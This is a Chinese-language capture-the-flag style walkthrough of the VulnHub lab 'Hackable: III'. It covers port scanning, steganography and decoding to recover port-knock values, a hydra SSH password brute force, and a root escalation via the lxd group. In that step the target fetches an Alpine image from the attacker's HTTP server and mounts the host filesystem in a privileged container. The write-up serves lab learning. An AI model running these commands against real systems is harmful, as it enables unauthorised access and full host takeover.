【VulnHub靶场】Hackable: III

这篇具有很好参考价值的文章主要介绍了【VulnHub靶场】Hackable: III。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Step 1

在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集
【VulnHub靶场】Hackable: III
Command used: << nmap -sV -p- 192.168.31.180 >>

Step 2

通过扫描我们可以得知80端口是开启状态,访问后得到以下界面
【VulnHub靶场】Hackable: III
查看其源代码
【VulnHub靶场】Hackable: III
我们可以得到一条注释

“Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com”
从中我们可以提取出几个有用的消息:
1.消息是dev_suport@hackable3.com发给jubiscleudo的,推测有jubiscleudo与hackable3用户
2.它的端口需要“敲开”
3.需要留意“.jpg”文件

在上方图片中,我们可以留意到还有一个a标签,指向另外一个界面
【VulnHub靶场】Hackable: III
进入后是一个登陆界面
【VulnHub靶场】Hackable: III
无论如何登陆,他都会跳转到login.php,并且显示源码
【VulnHub靶场】Hackable: III
我们可以收集到有config.php这个界面与3.jpg这个图片,我们分别访问
config.php是这个:
【VulnHub靶场】Hackable: III
告诉我们mysql的root用户没有密码
3.jpg是一张这样的图片:
【VulnHub靶场】Hackable: III
我们将图片保存下来
Command used: << wget http://192.168.31.180/3.jpg >>

这里我们需要用到一个图片隐写的工具steghide来对该图片进行分离
我们可以使用命令 apt install steghide来安装该工具
【VulnHub靶场】Hackable: III
Command used: << steghide --extract -sf 3.jpg >>
安装完成后我们可以使用上方命令进行分离,在passphrase一栏中直接enter即可得到一个文件
【VulnHub靶场】Hackable: III
经查看我们得到数字65535

Step 3

信息收集到这里还未结束,使用dirb工具扫描web
【VulnHub靶场】Hackable: III
Command used: << dirb http://192.168.31.180 >>
【VulnHub靶场】Hackable: III

访问backup,有一个wordlist.txt,推测是密码文件
【VulnHub靶场】Hackable: III
Command used: << wget http://192.168.31.180/backup/wordlist.txt >>
【VulnHub靶场】Hackable: III
访问config,有一个1.txt,里面有串类似base64的字符串
【VulnHub靶场】Hackable: III
尝试解开
【VulnHub靶场】Hackable: III
Command used: << echo “MTAwMDA=”|base64 -d >>
得到数字10000
【VulnHub靶场】Hackable: III
访问css,有一个2.txt,里面有一串编码
【VulnHub靶场】Hackable: III
经查询该加密为brainfuck加密
【VulnHub靶场】Hackable: III
bugku的ctf在线工具里面恰好也有该加解密的工具https://ctf.bugku.com/tool/brainfuck
解码后得到数字4444

Step 4

到此为止我们得到了三个数字:4444 10000 65535
这时我们需要这三个数字来敲开22端口!
我们使用apt install knockd来安装knock工具
【VulnHub靶场】Hackable: III
Command used: << knock -v 192.168.31.180 10000 4444 65535 >>
我们按照这个顺序敲开22端口,有关knock相关细节请查阅官方文档,这里不过多赘述

Step 5

【VulnHub靶场】Hackable: III

Command used: << hydra -l jubiscleudo -P wordlist.txt ssh://192.168.31.180 >>
然后我们通过九头蛇工具爆破jubiscleudo的密码
通过账号密码登录ssh
【VulnHub靶场】Hackable: III

查看html目录下有一个隐藏文件,在里面我们可以看到hackable_3用户的密码
【VulnHub靶场】Hackable: III
我们使用账号密码登录上hackable_3用户,查看它的所在组,发现116(lxd)

Step 6

我们将利用lxd组来进行提取,参考文章:https://blog.csdn.net/YouthBelief/article/details/123548739

攻击机操作

1.通过git将构建好的alpine镜像克隆至本地;

git clone https://github.com/saghul/lxd-alpine-builder.git

2.执行“build -alpine”命令完成最新版本的Alpine镜像构建,此操作必须由root用户完成;

cd lxd-alpine-builder   
sudo ./build-alpine

【VulnHub靶场】Hackable: III
3.将tar文件发送至目标设备,下载好后 启动python http访问 ;

python3 -m http.server 80
靶机操作

1.下载攻击机上的最新的apline包,注意是最新那份

wget http://192.168.31.244/alpine-v3.16-x86_64-20221107_0401.tar.gz

【VulnHub靶场】Hackable: III
2.导入镜像并初始化镜像

lxc image import ./alpine-v3.16-x86_64-20221107_0401.tar.gz --alias test
lxc init test test -c security.privileged=true

【VulnHub靶场】Hackable: III
运行到第二条报错,提示创建存储库,我们需要先初始化

lxd init    #一路回车

【VulnHub靶场】Hackable: III

我们再运行回第二条命令

lxc init test test -c security.privileged=true #初始化镜像

【VulnHub靶场】Hackable: III
3.挂载磁盘

lxc config device add test test disk source=/ path=/mnt/root recursive=true

4.启动镜像并进入镜像访问任意文件

lxc start test
lxc exec test /bin/sh
id
cd /mnt/root
ls

【VulnHub靶场】Hackable: III
结束游戏文章来源地址https://www.toymoban.com/news/detail-408059.html

到了这里,关于【VulnHub靶场】Hackable: III的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(43)
  • vulnhub——Earth靶机

    netdiscover 直接用netdiscover模糊搜索一下主机 可以发现靶机地址为192.168.60.174  80端口返回HTTP400,向下看发现有DNS解析  修改一下hosts文件  再次nmap进行扫描,之前返回HTTP400的页面就没问题了 下面有三行数值  https://terratest.earth.local的页面内容不一样 dirb扫描 http://earth.local、

    2024年02月02日
    浏览(45)
  • vulnhub momentum 靶机复盘

    到学校了 原来的桥接配置要改 这里记录几个点备忘 重新安装驱动VBoxNetLwf.inf 手动安装VBoxNetLwf.inf 不要用virtualbox自带的netlwfinstall rw init=/bin/bash 进去看看网卡配置 一个没什么功能点的web 在main.js下发现opus-details.php 可以传参id 然后会原封不动的展示 可以xss 没啥用 尝试对cook

    2024年02月06日
    浏览(42)
  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(109)
  • Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(32)
  • Vulnhub靶机:driftingblues 4

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues4(10.0.2.20) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 使用nmap主机发现靶机ip: 10.0.2.20 使用nmap端口扫描发现靶机开放端口: 21、22、80 打开网站没有可利用的功能点,并且

    2024年02月01日
    浏览(46)
  • vulnhub靶机Phineas

    下载地址:https://download.vulnhub.com/phineas/Phineas.ova 主机发现 目标154 端口扫描 端口服务扫描 漏洞扫描 直接访问web 初始页面,我就不信没东西,开扫! 访问一下 访问fuel时候发现url变化了 只能进行拼接url那就试一下凭借主页的文件(index.php) url变成这样了 提示是fuel直接去查

    2024年02月05日
    浏览(36)
  • vulnhub靶机Brainpan

    主机发现 arp-scan -l 端口扫描 nmap --min-rate 10000 -p- 192.168.21.156 服务扫描 nmap -sV -sT -O -p9999,10000 192.168.21.156 这个地方感到了有点不对劲,python起来的一个web端口 漏洞扫描 nmap --script=vuln -p9999,10000 192.168.21.156 意料之中,先去看一下web的内容 这个就是一张图片,但是还是扫个目录看

    2024年02月09日
    浏览(39)
  • vulnhub靶机02-Breakout

    主机发现 arp-scan -l 扫描端口 nmap --min-rate 10000 -p- 192.168.21.143 扫描端口信息 nmap -sV -sT -O -p80,139,445,10000,20000 192.168.21.143 漏洞扫描 nmap --script=vuln -p80,139,445,10000,20000 192.168.21.143 先看网站 什么都没有看看f12 找到点好东西 解码看看 Brainfuck/OoK加密解密 - Bugku CTF 这个应该没用了,再去

    2024年02月10日
    浏览(39)
  • Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包